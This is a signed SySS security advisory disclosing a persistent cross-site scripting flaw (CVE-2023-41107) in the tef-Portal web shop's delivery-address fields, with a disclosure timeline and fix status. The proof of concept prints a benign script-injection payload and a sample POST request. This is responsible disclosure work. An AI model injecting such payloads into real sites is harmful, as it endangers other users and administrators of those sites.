-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2023-020
Product:                   tef-Portal
Manufacturer:              tef-Dokumentation GmbH
Affected Version(s):       2023-07-17
Tested Version(s):         2023-07-17
Vulnerability Type:        Persistent Cross-Site Scripting (CWE-79) 
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2023-07-21
Solution Date:             2023-08-08
Public Disclosure:         2023-08-28
CVE Reference:             CVE-2023-41107
Authors of Advisory:       Sebastian Auwaerter, SySS GmbH
                           Nikolaus Seitzer, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The cloud-based software "tef-Portal" is a web shop system.

The manufacturer describes the product as follows (see [1]):

"With this portal, you are close to your dealers and service partners 
around the clock. You can optimize your dealer management with little 
effort and improve your partners' loyalty to you as a manufacturer."

Due to missing input validation, the tef-Portal is prone to a 
persistent cross-site scripting (PXSS) vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The fields for delivery addresses can be used for PXSS attacks as an 
authenticated user with the permissions to edit the delivery address. 
Other users, including administrators, will execute JavaScript code 
which has been injected into those parameters by an attacker as soon 
as they navigate to the delivery address.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Create a delivery address containing an XSS attack vector like
<script>alert(1)</script> in any of the fields:

POST /<customer>-portal/modules/Shop/Windows/Lieferadresse.aspx HTTP/1.1
Host: <customer>.tef-kat.com
Cookie: ASP.NET_SessionId=<censored>

[...]

txtName1=a%3Cscript%3Ealert%281%29%3C%2Fscript%3E

[...]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

tef has fixed this vulnerability on its cloud service. Therefore, the 
vulnerability does not exist anymore.

More information can be found at https://tef.de/blog-2/.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-07-17: Vulnerability discovered
2023-07-21: Vulnerability reported to manufacturer
2023-08-08: Patch released by manufacturer
2023-08-28: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for tef-Portal
    https://tef.de/en/software-solutions/tef-portal/
[2] SySS Security Advisory SYSS-2023-020
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-020.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Auwaerter and
Nikolaus Seitzer of SySS GmbH.

E-Mail: sebastian.auwaerter@syss.de
Public Key: https://www.syss.de/kontakt/pgp-keys
Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6

E-Mail: nikolaus.seitzer@syss.de
Public Key: https://www.syss.de/kontakt/pgp-keys
Key Fingerprint: 726A 551F 5717 BB28 B45F  9F9E 3242 E1E4 E9EB 1DF1


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEcmpVH1cXuyi0X5+eMkLh5OnrHfEFAmTodJEACgkQMkLh5Onr
HfFvDw/+LFOckW5OhduaFol10W7kPqNf2UqLDZ0OUf3wgvSg2VMHgd8h8eWz7F4D
5v4e+ohMz+igJJM6wH3cYgC0UPq/F+W0YkqoB3y8Mwf8Sqtw69aD4OtBYQTX4R1U
8r7h4NcNqdYpDZS+KnkiQlvIl8Hilj1BuyIRHLPCEMy0bpuukBpjSDhhXzY7QD+H
x+Yvn3SpCztjYqMIBZ0Yobn/DS5b/dLhOkBQDFjT/AvKrIy6bmD6plcdpZBBNelg
Cdt3h//B7GGk1FYWbZqPzkicpN5vK+luzPAUj0mmWHShSeec2lnlq9CWZX2k3fs0
zh+dRnY7uYgSg8gjYNHxqnghSYuocwA4P/m/tEQi50yba2KbtBrH31wKw7lRaBUr
eApJPtf4UkRVbEVFdxVzh97UobO/KU4K/I559Vy7K5sX/r3eqp21kmXDA0niZMDF
tg6IYR9bxah+/rZn64ApCzSXMtSqVISQZ7Pm1yLq8/9t9jXtiMl/Nq+i4JTCwPz+
I8q3sqCiSg9GLIhZggWLruQNQCDIMwqUEI607Y1j21Z4bQNjPCNH3+EO9bPzfoKO
eoAdzbNwecQmtBme7pQA9GcUzQCz5a8aja+0GgxOTwMLIOer2OUQO/0U7mnUIH75
x9UiWewjhX4QfCSYA8toNf1CVIccz1hTscsRFBOU56JhNZ0pc5A=
=TuqT
-----END PGP SIGNATURE-----